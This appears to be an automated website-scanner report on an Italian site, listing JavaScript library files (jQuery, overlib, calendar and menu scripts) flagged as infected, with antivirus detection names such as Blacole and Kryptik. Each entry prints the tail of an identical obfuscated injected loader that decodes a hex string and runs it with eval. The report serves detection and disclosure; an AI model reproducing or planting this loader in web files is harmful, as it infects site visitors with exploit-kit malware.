Request | Server response | Status |
http://www.studiolurgi.it/ | 200 OK Content-Length: 28183 Content-Type: text/html | clean |
http://www.studiolurgi.it/includes/javascript/ColorPicker2.js | 200 OK Content-Length: 13019 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
ColorPicker_targetInput = null;
function ColorPicker_writeDiv(){document.writeln("<DIV ID=\"colorPickerDiv\" STYLE=\"position:absolute;visibility:hidden;\"> </DIV>");}
function ColorPicker_show(anchorname){this.showPopup(anchorname);}
function ColorPicker_pickColor(color,obj){obj.hidePopup();pickColor(color);}
function pickColor(color){if(ColorPicker_targetInput==null){alert("Target Input is null, which means you either didn't use the 'select' function or yo
... 3091 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/AnchorPosition.js | 200 OK Content-Length: 11855 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function getAnchorPosition(anchorname) {
var useWindow=false;
var coordinates=new Object();
var x=0,y=0;
var use_gebi=false, use_css=false, use_layers=false;
if (document.getElementById) { use_gebi=true; }
else if (document.all) { use_css=true; }
else if (document.layers) { use_layers=true; }
if (use_gebi && document.all) {
x=AnchorPosition_getPageOffsetLeft(document.all[anchorname]);
y=AnchorPosition_ge
... 3271 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/PopupWindow.js | 200 OK Content-Length: 16682 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function PopupWindow_getXYPosition(anchorname) {
var coordinates;
if (this.type == "WINDOW") {
coordinates = getAnchorWindowPosition(anchorname);
}
else {
coordinates = getAnchorPosition(anchorname);
}
this.x = coordinates.x;
this.y = coordinates.y;
}
function PopupWindow_setSize(width,height) {
this.width = width;
this.height = height;
}
function PopupWindow_populate(contents) {
... 3300 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/CalendarPopup.js | 200 OK Content-Length: 32663 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function CalendarPopup() {
var c;
if (arguments.length>0) {
c = new PopupWindow(arguments[0]);
}
else {
c = new PopupWindow();
c.setSize(150,175);
}
c.offsetX = -152;
c.offsetY = 25;
c.autoHide();
c.monthNames = new Array("January","February","March","April","May","June","July","August","September","October","November","December");
c.monthAbbreviations = new Array("Jan","Feb","Mar","Apr","Ma
... 3203 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/date.js | 200 OK Content-Length: 18988 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var MONTH_NAMES=new Array('January','February','March','April','May','June','July','August','September','October','November','December','Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec');
var DAY_NAMES=new Array('Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sun','Mon','Tue','Wed','Thu','Fri','Sat');
function LZ(x) {return(x<0||x>9?"":"0")+x}
function isDate(val,format) {
var date=getDateFromFormat(
... 3320 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Emsisoft
- Trojan.Script.503932 (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/rollover.js | 200 OK Content-Length: 7270 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function init() {
if (!document.getElementById) return
var imgOriginSrc;
var imgTemp = new Array();
var imgarr = document.getElementsByTagName('img');
for (var i = 0; i < imgarr.length; i++) {
if (imgarr[i].getAttribute('hsrc')) {
imgTemp[i] = new Image();
imgTemp[i].src = imgarr[i].getAttribute('hsrc');
imgarr[i].onmouseover = function() {
imgOriginSrc = this.getAttribute('src');
<
... 3111 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Emsisoft
- Trojan.Script.503932 (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/ExpandCollapse.js | 200 OK Content-Length: 9119 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var enablepersist="on" var collapseprevious="yes"
if (document.getElementById){
document.write('<style type="text/css">')
document.write('.switchcontent{display:none;}')
document.write('</style>')
}
function getElementbyClass(classname){
ccollect=new Array()
var inc=0
var alltags=document.all? document.all : document.getElementsByTagName("*")
for (i=0; i<alltags.length; i++){
if (alltags[i].className==classn
... 3357 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Emsisoft
- Trojan.Script.503932 (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/overlib.js | 200 OK Content-Length: 50131 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
var olLoaded = 0;var pmStart = 10000000; var pmUpper = 10001000; var pmCount = pmStart+1; var pms = new Array(); var olInfo = new Info('4.00', 1);
var FREPLACE = 0; var FBEFORE = 1; var FAFTER = 2; var FALTERNATE = 3;
var olHideForm=0; registerCommands('donothing,inarray,caparray,sticky,background,noclose,caption,left,right,center,offsetx,offsety,fgcolor,bgcolor,textcolor,capcolor,closecolor,width,border,cellpad,status,autostatus,autostatuscap,height,closetext,snapx,snapy,fixx,
... 3108 bytes are skipped ...Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
/*/a9a007*/
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/jquery.js | 200 OK Content-Length: 63594 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=do
... 3095 bytes are skipped ...Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
/*/a9a007*/
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/menu.js | 200 OK Content-Length: 22496 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(jQuery){
jQuery.each(['backgroundColor', 'borderBottomColor', 'borderLeftColor', 'borderRightColor', 'borderTopColor', 'color', 'outlineColor'], function(i,attr){
jQuery.fx.step[attr] = function(fx){
if ( fx.state == 0 ) {
fx.start = getColor( fx.elem, attr );
fx.end = getRGB( fx.end );
}
if ( fx.start )
fx.elem.style[attr] = "rgb(" + [
Math.max(Math.mi
... 3244 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Comodo
- TrojWare.JS.Kryptik.xt
- Emsisoft
- Trojan.Script.503932 (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/javascript/main.js | 200 OK Content-Length: 7651 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
this.screenshotPreview = function(){
xOffset = 10;
yOffset = 30;
$("a.screenshot").hover(function(e){
this.t = this.title;
this.title = "";
var c = (this.t != "") ? this.t : "";
$("body").append("<p id='screenshot'>"+ c +"</p>");
$("#screenshot")
.css("top",(e.pageY - xOffset) + "px")
.css("left",(e.pageX + yOffset) +
... 3172 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Emsisoft
- Trojan.Script.503932 (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- BitDefender
- Trojan.Script.503932
|
http://www.studiolurgi.it/includes/htmlarea3.0/htmlarea.js | 200 OK Content-Length: 77571 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
if (typeof _editor_url == "string") {
_editor_url = _editor_url.replace(/\x2f*$/, '/');
} else {
alert("WARNING: _editor_url is not set! You should set this variable to the editor files path; it should preferably be an absolute path, like in '/htmlarea', but it can be relative if you prefer. Further we will try to load the editor files correctly but we'll probably fail.");
_editor_url = '';
}
if (typeof _editor_lang == "string") {
_editor_lan
... 3330 bytes are skipped ...q2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq64Zq5aZq58Zq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[uakerb]("Zq");}gnhati=sslp;jivn=[];for(hwfnoo=22-20-2;-hwfnoo+1395!=0;hwfnoo+=1){auzl=hwfnoo;if((0x19==031))jivn+=kreczq.fromCharCode(eval(vvnb+gnhati[1*auzl])+0xa-oajwki);}etno=eval;if(Math.ceil(5.5)===6)etno(jivn)}
Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ad-Aware
- Trojan.Script.503932
- Ikarus
- Trojan-Downloader.JS.Iframe
- Rising
- JS:Trojan.Script.JS.Quidvetis.a!1612880
- nProtect
- Trojan.Script.503932
- Emsisoft
- Trojan.Script.503932 (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NX
- MicroWorld-eScan
- Trojan.Script.503932
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- Trojan.Script.503932
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- Trojan.Script.503932
- ESET-NOD32
- JS/Kryptik.AOW
- BitDefender
- Trojan.Script.503932
|
http://salvatorismater.home.pl/ksiegarnia/h7dMfj2I.php | 200 OK Content-Length: 122214 Content-Type: text/html | clean |
http://salvatorismater.home.pl/index.php?strona=refleksja | 200 OK Content-Length: 120044 Content-Type: text/html | clean |